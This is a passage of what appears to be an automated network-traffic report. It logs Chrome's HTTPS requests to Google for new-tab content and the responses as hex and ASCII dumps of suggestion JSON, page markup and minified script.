Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-23 06:09:24 UTC	124	IN	Data Raw: 65 39 63 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 32 30 32 35 20 6e 66 6c 20 6d 6f 63 6b 20 64 72 61 66 74 73 22 2c 22 64 72 69 6e 6b 69 6e 67 20 77 61 74 65 72 20 63 68 65 6d 69 63 61 6c 22 2c 22 63 6f 6c 6c 65 67 65 20 67 69 72 6c 73 20 73 65 61 73 6f 6e 20 33 22 2c 22 6f 76 65 72 77 61 74 63 68 20 68 65 72 6f 20 68 61 7a 61 72 64 22 2c 22 73 6f 63 69 61 6c 20 73 65 63 Data Ascii: e9c)]}'["",["2025 nfl mock drafts","drinking water chemical","college girls season 3","overwatch hero hazard","social sec
2024-11-23 06:09:24 UTC	1390	IN	Data Raw: 75 72 69 74 79 20 70 61 79 6d 65 6e 74 73 22 2c 22 62 6f 6d 62 20 63 79 63 6c 6f 6e 65 20 73 74 6f 72 6d 20 63 61 6c 69 66 6f 72 6e 69 61 22 2c 22 6e 6f 76 65 6d 62 65 72 20 32 32 20 77 6f 72 64 6c 65 20 61 6e 73 77 65 72 22 2c 22 6d 6f 6e 6f 70 6f 6c 79 20 67 6f 20 73 70 61 63 65 20 73 70 72 6f 75 74 73 20 72 65 77 61 72 64 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 Data Ascii: urity payments","bomb cyclone storm california","november 22 wordle answer","monopoly go space sprouts rewards"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","g
2024-11-23 06:09:24 UTC	1390	IN	Data Raw: 4d 33 65 44 49 34 61 6b 56 47 54 43 73 78 4f 57 6c 4e 54 48 6b 35 53 45 39 4a 4d 6e 68 47 64 7a 42 35 61 6b 6c 4c 56 31 56 53 4d 44 4a 5a 55 6c 5a 75 65 47 52 51 56 32 74 52 65 55 4d 77 64 45 70 50 62 31 70 43 4e 6d 78 69 56 30 39 45 54 44 52 74 57 46 46 35 4e 32 70 6e 61 6d 31 61 63 47 4e 49 56 55 52 30 4d 6d 6c 68 61 47 31 74 56 6b 5a 6d 52 45 68 58 4f 46 42 54 56 45 4e 57 52 33 56 55 56 48 6c 68 4c 32 6c 56 59 6a 56 73 53 56 55 34 5a 7a 4d 31 52 30 78 73 65 6b 55 31 63 58 6c 57 57 47 6f 79 5a 53 39 6d 53 6c 4a 71 56 56 6b 76 63 43 38 7a 4e 31 52 75 63 7a 42 4f 55 57 6f 35 54 6a 52 68 5a 30 39 79 51 55 4a 44 63 48 59 35 64 7a 4a 34 4e 6c 4a 6a 52 55 64 71 52 57 64 42 5a 58 4d 32 53 44 52 4f 65 6e 56 50 56 32 46 4c 61 32 70 71 63 6b 56 4e 51 31 68 78 57 Data Ascii: M3eDI4akVGTCsxOWlNTHk5SE9JMnhGdzB5aklLV1VSMDJZUlZueGRQV2tReUMwdEpPb1pCNmxiV09ETDRtWFF5N2pnam1acGNIVUR0MmlhaG1tVkZmREhXOFBTVENWR3VUVHlhL2lVYjVsSVU4ZzM1R0xsekU1cXlWWGoyZS9mSlJqVVkvcC8zN1RuczBOUWo5TjRhZ09yQUJDcHY5dzJ4NlJjRUdqRWdBZXM2SDROenVPV2FLa2pqckVNQ1hxW
2024-11-23 06:09:24 UTC	843	IN	Data Raw: 53 56 5a 46 65 6c 56 51 61 7a 46 4a 4e 6e 42 53 52 32 78 70 53 33 6c 42 62 46 4a 46 4d 47 74 71 62 6e 56 47 5a 6d 4a 30 64 56 4e 69 4f 44 49 33 4d 6e 68 35 53 7a 46 6f 59 58 46 36 4e 46 52 58 63 6d 4e 72 4d 31 42 54 56 6c 64 56 55 54 41 77 61 48 42 4a 63 47 74 79 56 30 6c 61 62 44 42 73 51 6b 30 7a 51 58 5a 77 4d 6e 4e 4d 4d 30 68 35 4c 33 55 35 54 56 52 77 61 31 41 77 4f 48 68 55 54 33 4a 4b 65 6e 68 45 63 57 35 34 56 6c 42 4d 55 6e 4a 49 52 6c 4e 56 4d 45 78 68 53 47 70 73 61 57 64 6b 4d 54 46 43 63 6b 68 68 64 31 64 33 52 6e 4a 58 64 6e 68 6c 4e 45 39 44 53 46 4a 48 56 54 4e 6b 62 6a 55 7a 4c 33 49 79 5a 7a 6c 68 63 44 68 4a 62 57 46 79 63 56 70 56 56 58 68 54 62 55 39 45 55 54 42 6d 56 45 52 4e 63 46 4a 55 63 45 6f 77 4d 6e 5a 31 55 33 45 34 4f 44 6b Data Ascii: SVZFelVQazFJNnBSR2xpS3lBbFJFMGtqbnVGZmJ0dVNiODI3Mnh5SzFoYXF6NFRXcmNrM1BTVldVUTAwaHBJcGtyV0labDBsQk0zQXZwMnNMM0h5L3U5TVRwa1AwOHhUT3JKenhEcW54VlBMUnJIRlNVMExhSGpsaWdkMTFCckhhd1d3RnJXdnhlNE9DSFJHVTNkbjUzL3IyZzlhcDhJbWFycVpVVXhTbU9EUTBmVERNcFJUcEowMnZ1U3E4ODk
2024-11-23 06:09:24 UTC	91	IN	Data Raw: 35 35 0d 0a 58 4a 79 53 48 5a 36 61 6d 52 58 54 58 52 69 53 47 4a 6e 56 48 46 5a 54 48 52 36 51 30 46 34 5a 47 64 6e 57 6b 78 58 4d 33 55 35 4f 58 59 79 65 46 56 49 54 45 68 54 55 48 70 47 59 56 46 4f 4e 55 4a 48 53 6b 34 77 59 55 70 46 51 6e 4e 4d 52 47 35 44 4d 46 0d 0a Data Ascii: 55XJySHZ6amRXTXRiSGJnVHFZTHR6Q0F4ZGdnWkxXM3U5OXYyeFVITEhTUHpGYVFONUJHSk4wYUpFQnNMRG5DMF
2024-11-23 06:09:24 UTC	1390	IN	Data Raw: 36 33 30 0d 0a 70 70 59 6b 4a 42 52 55 70 6e 54 7a 42 48 4e 46 68 56 55 47 39 71 61 6d 56 47 5a 47 55 35 63 6d 68 33 54 31 42 68 4f 58 67 35 55 6d 6c 71 53 6d 78 76 5a 30 6c 4d 61 56 56 52 62 6d 52 71 53 55 70 4c 55 31 45 77 63 32 4a 44 4c 30 39 73 5a 32 49 76 55 56 6b 31 57 45 6f 7a 57 56 59 35 4e 58 68 59 63 30 4a 73 61 54 46 5a 63 31 4e 4a 62 6c 63 7a 54 6e 68 36 5a 32 68 75 53 45 35 48 52 44 46 53 4e 7a 52 45 56 31 70 71 53 55 35 4b 61 48 56 30 63 6d 68 6e 64 7a 56 34 52 6a 42 75 63 48 4a 44 61 57 74 76 65 47 52 49 57 43 39 30 53 57 6c 74 57 6e 46 33 62 58 68 71 61 56 70 4f 56 6e 49 7a 51 58 56 30 4f 45 4e 31 52 6d 31 36 59 57 68 7a 63 43 39 56 53 54 56 42 63 56 56 6b 65 6b 4e 7a 65 6c 45 77 64 47 5a 4b 55 6e 6c 53 51 31 4a 76 53 46 6c 44 59 6e 41 32 Data Ascii: 630ppYkJBRUpnTzBHNFhVUG9qamVGZGU5cmh3T1BhOXg5UmlqSmxvZ0lMaVVRbmRqSUpLU1Ewc2JDL09sZ2IvUVk1WEozWVY5NXhYc0JsaTFZc1NJblczTnh6Z2huSE5HRDFSNzREV1pqSU5KaHV0cmhndzV4RjBucHJDaWtveGRIWC90SWltWnF3bXhqaVpOVnIzQXV0OEN1Rm16YWhzcC9VSTVBcVVkekNzelEwdGZKUnlSQ1JvSFlDYnA2
2024-11-23 06:09:24 UTC	201	IN	Data Raw: 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a Data Ascii: stsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","ENTITY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
2024-11-23 06:09:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49743	142.250.181.100	443	7260	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:24 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	49745	142.250.181.100	443	7260	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:24 UTC	498	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-23 06:09:25 UTC	1018	IN	HTTP/1.1 200 OK Version: 698289427 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 23 Nov 2024 06:09:24 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-23 06:09:25 UTC	372	IN	Data Raw: 31 64 39 34 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 1d94)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-11-23 06:09:25 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-11-23 06:09:25 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-11-23 06:09:25 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-11-23 06:09:25 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-11-23 06:09:25 UTC	1390	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 32 37 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700327,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window\u003dthis
2024-11-23 06:09:25 UTC	258	IN	Data Raw: 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d Data Ascii: or(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor(a){this.i\u003da}
2024-11-23 06:09:25 UTC	364	IN	Data Raw: 31 36 35 0d 0a 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4c 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4b 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 48 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 66 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 5b 49 64 28 5c 22 64 61 74 61 5c 22 29 2c 49 64 28 5c 22 68 74 74 70 5c 22 29 2c 49 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 49 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 49 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 48 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b Data Ascii: 165oString(){return this.i}};_.Ld\u003dnew _.Kd(\"about:invalid#zClosurez\");_.Hd\u003dclass{constructor(a){this.fh\u003da}};_.Md\u003d[Id(\"data\"),Id(\"http\"),Id(\"https\"),Id(\"mailto\"),Id(\"ftp\"),new _.Hd(a\u003d\u003e/^[^:]*([/?#]\|$)/.test(a))];
2024-11-23 06:09:25 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 53 64 2c 66 65 2c 52 64 2c 54 64 2c 59 64 3b 5f 2e 50 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 61 3a 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 5f 2e 51 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 29 7b 69 66 Data Ascii: 8000mptyHTML:\"\");\n}catch(e){_._DumpException(e)}\ntry{\nvar Sd,fe,Rd,Td,Yd;_.Pd\u003dfunction(a){return a\u003d\u003dnull?a:Number.isFinite(a)?a\|0:void 0};_.Qd\u003dfunction(a){if(a\u003d\u003dnull)return a;if(typeof a\u003d\u003d\u003d\"string\"){if
2024-11-23 06:09:25 UTC	1390	IN	Data Raw: 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 64 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 51 64 28 5f 2e 4a 63 28 61 2c 62 29 29 7d 3b 5f 2e 53 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 50 64 28 5f 2e 4a 63 28 61 2c 62 29 29 7d 3b 5f 2e 54 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 76 62 28 5f 2e 64 65 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 65 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 76 62 28 5f 2e 53 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 67 65 5c 75 30 30 33 64 66 75 6e 63 74 69 Data Ascii: b,c,!1)!\u003d\u003dvoid 0};_.de\u003dfunction(a,b){return _.Qd(_.Jc(a,b))};_.S\u003dfunction(a,b){return _.Pd(_.Jc(a,b))};_.T\u003dfunction(a,b,c\u003d0){return _.vb(_.de(a,b),c)};_.ee\u003dfunction(a,b,c\u003d0){return _.vb(_.S(a,b),c)};_.ge\u003dfuncti

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	49746	142.250.181.100	443	7260	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:24 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-23 06:09:25 UTC	933	IN	HTTP/1.1 200 OK Version: 698289427 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 23 Nov 2024 06:09:24 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 